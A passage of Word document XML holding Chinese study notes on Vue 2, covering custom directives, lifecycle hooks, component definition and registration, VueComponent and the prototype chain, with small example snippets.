        </w:rPr>
        <w:t>- bind：指令与元素成功绑定时调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- inserted：指令所在元素被插入页面时调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- update：指令所在模板结构被重新解析时调用</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 指令定义时不加v-，但使用时要加v-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 指令名如果是多个单词，要使用kebab-case命名方式，不要用camelCase命名</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·案例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 需求1：定义一个v-big指令，和v-text功能类似，但会把绑定的数值放大10倍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 需求2：定义一个v-fbind指令，和v-bind功能类似，但可以让其所绑定的input元素默认获取焦点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自定义指令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{{name}}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当前的n值是：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&lt;h2&gt;放大10倍后的n值是：&lt;span v-big-number="n"&gt;&lt;/span&gt; &lt;/h2&gt;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放大10倍后的n值是：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v-big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"n++"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点我n+1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v-fbind:value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//定义全局指令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Vue.directive('fbind',{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//指令与元素成功绑定时（一上来）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bind(element,binding){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element.value = binding.value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//指令所在元素被插入页面时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inserted(element,binding){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element.focus()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//指令所在的模板被重新解析时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update(element,binding){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element.value = binding.value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//配置自定义指令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directives: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//big函数何时会被调用？1.指令与元素成功绑定时（一上来）。2.指令所在的模板被重新解析时。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'big-number'(element,binding){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// console.log('big')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element.innerText = binding.value * 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//第一个参数是指令所在的DOM元素对象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//第二个参数是包含v-xxx传入的值等信息的绑定对象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//注意此处的this是window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console.log('big')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innerText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*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fbind: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//指令与元素成功绑定时（一上来）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//指令所在元素被插入页面时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inserted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//默认获取焦点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//指令所在的模板被重新解析时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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·又名：生命周期回调函数、生命周期函数、生命周期钩子。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue在关键时刻帮我们调用的一些特殊名称的函数。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·生命周期函数的名字不可更改，但函数的具体内容是程序员根据需求编写的。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·生命周期函数中的this指向是vm 或 组件实例对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>引出生命周期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·刚开始透明度为1，慢慢变为0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·循环变化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2119630" cy="911225"/>
            <wp:effectExtent l="0" t="0" r="13970" b="3175"/>
            <wp:docPr id="5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5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引出生命周期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你好啊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&lt;!--重名可用对象的简写形式--&gt;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"{opacity}"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欢迎学习Vue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//Vue完成模板的解析并把初始的真实DOM元素放入页面后（挂载完毕）调用mounted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//模板第一次解析完成并显示完模板页面时调用，只调用一次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'mounted'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setInterval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//箭头函数的this会往外找，这里的this就是vue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&lt;=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//通过外部的定时器实现（不推荐）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setInterval(() =&gt;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vm.opacity -= 0.01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if(vm.opacity &lt;= 0) vm.opacity = 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},16)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分析生命周期</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="6776085"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="13" name="图片 13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生命周期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776085"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="115" name="图片 115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生命周期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分析生命周期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当前的n值是：{{n}}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点我n+1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"bye"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点我销毁vm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//设置模板并替换掉原有模板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//vue2.0必须只有一个根节点，一般用div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//不可用template作为根节点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template:`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&lt;h2&gt;当前的n值是：{{n}}&lt;/h2&gt;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&lt;button @click="add"&gt;点我n+1&lt;/button&gt;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`,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++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bye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'bye'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'n变了'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//挂载流程开始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//数据检测和数据代理创建之前，无法通过vm访问到data中的数据、methods中的方法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'beforeCreate'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console.log(this);//这里的this是vm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//断点，代码调试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debugger;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//数据检测和数据代理创建完成，可以通过vm访问到data中的数据、methods中的方法，模板未解析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created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'created'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//挂载之前，模板解析完成，未转换成真实dom，此处对dom的操作都不生效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beforeMount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'beforeMount'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//挂载完成，已转换成真实dom，可对dom操作，但最好不要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//一般在此处进行：开启定时器、发送网络请求、订阅消息、绑定自定义事件等初始化操作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//已将真实dom赋值给vm.$el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'mounted'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//挂载流程结束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//更新流程开始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//当data中的数据改变时,更新之前,此时数据是新的，但页面是旧的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beforeUpdate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'beforeUpdate'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//更新完成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//数据是新的，页面也是新的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//更新流程结束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//销毁流程开始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//vm.$destroy()会完全销毁一个实例，清理它与其他实例的连接，解绑它的全部指令及事件监听器，click事件可用，但不会更新数据和页面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//当vm.$destroy()开始调用时，销毁之前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//data、methods、指令等都处于可用状态，但是对数据的所有操作都不会触发页面更新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//一般在此时关闭定时器、取消订阅消息、解绑自定义事件等收尾操作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'beforeDestroy'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this.add();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console.log(this.n);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//销毁完成，完全销毁一个实例，清理它与其他实例的连接，解绑它的全部指令及事件监听器，click事件可用，但不会更新数据和页面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destroyed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'destroyed'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总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·常用的生命周期钩子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- mounted: 发送ajax请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- beforeDestroy: 清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·关于销毁Vue实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 销毁后借助Vue开发者工具看不到任何信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 销毁后自定义事件会失效，但原生DOM事件依然有效</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 一般不会在beforeDestroy操作数据，因为即便操作数据，也不会再触发更新流程了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引出生命周期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"{opacity}"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欢迎学习Vue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"opacity = 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透明度设置为1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@click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"stop"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点我停止变换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//在大多数场景中不应该调用$destroy()。最好使用 v-if 和 v-for 指令以数据驱动的方式控制子组件的生命周期。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//Vue完成模板的解析并把初始的真实DOM元素放入页面后（挂载完毕）调用mounted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'mounted'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//开始定时器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setInterval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'setInterval'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&lt;=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//销毁定时器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clearInterval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'vm即将驾鹤西游了'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组件</w:t>
      </w:r>
    </w:p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16" name="图片 16" descr="90c1990fdf249553d0db2dc45da90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0c1990fdf249553d0db2dc45da90b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17" name="图片 17" descr="4bfa815c3002b7d68c6b0d289c88e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bfa815c3002b7d68c6b0d289c88ee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18" name="图片 18" descr="24e0c9fa5fac313dc4fc3dcdbc5d3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4e0c9fa5fac313dc4fc3dcdbc5d3c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·模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 向外提供特定功能的 js 程序, 一般就是一个js 文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 复用js, 简化js 的编写, 提高js 运行效率</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 用来实现局部(特定)功能效果的代码集合(html/css/js/image…..)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 复用编码, 简化项目编码, 提高运行效率</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·模块化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当应用中的js 都以模块来编写的, 那这个应用就是一个模块化的应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·组件化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当应用中的功能都是多组件的方式来编写的, 那这个应用就是一个组件化的应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非单文件组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一个文件中包含有n个组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·css样式与组件脱离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>· Vue中使用组件的三大步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 定义组件(创建组件)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 注册组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用组件(写组件标签)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如何定义一个组件？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用Vue.extend(options)创建，其中options和new Vue(options)时传入的那个options几乎一样，但也有点区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 区别如下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el不要写，最终所有的组件都要经过一个vm的管理，由vm中的el决定服务哪个容器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data必须写成函数，避免组件被复用时，数据存在引用关系。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用template可以配置组件结构</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如何注册组件？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 局部注册</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 靠new Vue的时候传入components选项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 全局注册：靠Vue.component('组件名',组件)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·编写组件标签</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-  &lt;school&gt;&lt;/school&gt;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基本使用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使用全局组件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{{msg}}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第三步：编写组件标签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第三步：编写组件标签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使用全局组件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//第一步：创建school组件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//配置html结构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 class="demo"&gt;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&lt;h2&gt;学校名称：{{schoolName}}&lt;/h2&gt;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&lt;h2&gt;学校地址：{{address}}&lt;/h2&gt;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&lt;button @click="showName"&gt;点我提示学校名&lt;/button&gt;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el:'#root', //组件定义时，一定不要写el配置项，因为最终所有的组件都要被一个vm管理，由vm决定服务于哪个容器。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//组件中的data要用函数的形式写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'北京昌平'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//第一步：创建student组件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//配置html结构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&lt;h2&gt;学生姓名：{{studentName}}&lt;/h2&gt;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&lt;h2&gt;学生年龄：{{age}}&lt;/h2&gt;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//第一步：创建hello组件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//配置html结构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&lt;h2&gt;你好啊！{{name}}&lt;/h2&gt;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'Tom'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//第二步：全局注册组件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component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'你好啊！'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//第二步：注册组件（局部注册）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school:school,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//简写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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几个注意的点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·关于组件名:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 一个单词组成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第一种写法(首字母小写)：school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第二种写法(首字母大写)：School</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 多个单词组成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第一种写法(kebab-case命名)：my-school</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 第二种写法(CamelCase命名)：MySchool (需要Vue脚手架支持)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 备注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组件名尽可能回避HTML中已有的元素名称，例如：h2、H2都不行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可以使用name配置项指定组件在开发者工具中呈现的名字</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·关于组件标签</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第一种写法：&lt;school&gt;&lt;/school&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 第二种写法：&lt;school/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注：不用使用脚手架时，&lt;school/&gt;会导致后续组件不能渲染。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一个简写方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- const school = Vue.extend(options) 可简写为：const school = options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几个注意点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{{msg}}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//定义组件名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&lt;h2&gt;学校名称：{{name}}&lt;/h2&gt;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&lt;h2&gt;学校地址：{{address}}&lt;/h2&gt;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'欢迎学习Vue!'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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件的嵌套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组件的嵌套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//定义student组件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&lt;h2&gt;学生姓名：{{name}}&lt;/h2&gt;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&lt;h2&gt;学生年龄：{{age}}&lt;/h2&gt;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//定义school组件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//在配置模板中写入注册的组件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&lt;h2&gt;学校名称：{{name}}&lt;/h2&gt;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&lt;h2&gt;学校地址：{{address}}&lt;/h2&gt;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&lt;student&gt;&lt;/student&gt;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//在组件中注册组件（局部）,要在组件定义之后注册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//定义hello组件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`&lt;h1&gt;{{msg}}&lt;/h1&gt;`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'欢迎来到尚硅谷学习！'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//定义app组件，用于管理应用中所有的组件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//在配置模板中写入注册的组件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&lt;hello&gt;&lt;/hello&gt;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&lt;school&gt;&lt;/school&gt;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//在组件中注册组件（局部）,要在组件定义之后注册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hello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//在配置模板中写入注册的组件，也可以在el模块中直接写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'&lt;app&gt;&lt;/app&gt;'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//注册组件（局部）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t>VueComponent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·关于VueComponent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- school组件本质是一个名为VueComponent的构造函数，且不是程序员定义的，是Vue.extend生成的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 我们只需要写&lt;school/&gt;或&lt;school&gt;&lt;/school&gt;，Vue解析时会帮我们创建school组件的实例对象，即Vue帮我们执行的：new VueComponent(options)。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·特别注意</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 每次调用Vue.extend，返回的都是一个全新的VueComponent！！！！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·关于this指向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 组件配置中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data函数、methods中的函数、watch中的函数、computed中的函数 它们的this均是【VueComponent实例对象】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- new Vue(options)配置中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data函数、methods中的函数、watch中的函数、computed中的函数 它们的this均是【Vue实例对象】</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·VueComponent的实例对象，以后简称vc（也可称之为：组件实例对象）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue的实例对象，以后简称vm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VueComponent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//定义school组件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&lt;h2&gt;学校名称：{{name}}&lt;/h2&gt;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&lt;h2&gt;学校地址：{{address}}&lt;/h2&gt;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&lt;button @click="showName"&gt;点我提示学校名&lt;/button&gt;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'showName'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`&lt;span&gt;atguigu&lt;/span&gt;`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//定义hello组件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&lt;h2&gt;{{msg}}&lt;/h2&gt;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&lt;test&gt;&lt;/test&gt;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'你好啊！'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console.log('@',school)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console.log('#',hello)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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vue实例(vm)与组件实例(vc)的区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·组件是可复用的 Vue 实例，所以它们与 new Vue 接收相同的选项，例如 data、computed、watch、methods 以及生命周期钩子等</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·仅有的例外是像 el 这样根实例特有的选项</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vc的data 必须是一个函数，每个实例可以维护一份被返回对象的独立的拷贝</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vue实例和组件实例的原型链</w:t>
      </w:r>
    </w:p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20" name="图片 20" descr="4f4b2dcf2a0cffd6a91672158eb4d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f4b2dcf2a0cffd6a91672158eb4de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·一个重要的内置关系：VueComponent.prototype.__proto__ === Vue.prototype</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·为什么要有这个关系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 让组件实例对象（vc）可以访问到 Vue原型上的属性、方法。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一个重要的内置关系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"../js/vue.js"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准备好一个容器--&gt;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这里会自动创建VueComponent的实例对象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//定义一个构造函数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function Demo(){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this.a = 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this.b = 2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//创建一个Demo的实例对象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const d = new Demo()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console.log(Demo.prototype) //显示原型属性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console.log(d.__proto__) //隐式原型属性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console.log(Demo.prototype === d.__proto__)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//程序员通过显示原型属性操作原型对象，追加一个x属性，值为99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Demo.prototype.x = 99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console.log('@',d)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//阻止 vue 在启动时生成生产提示。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99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//定义school组件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extend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&lt;h2&gt;学校名称：{{name}}&lt;/h2&gt;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&lt;h2&gt;学校地址：{{address}}&lt;/h2&gt;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    &lt;button @click="showX"&gt;点我输出x&lt;/button&gt;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    &lt;/div&gt;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            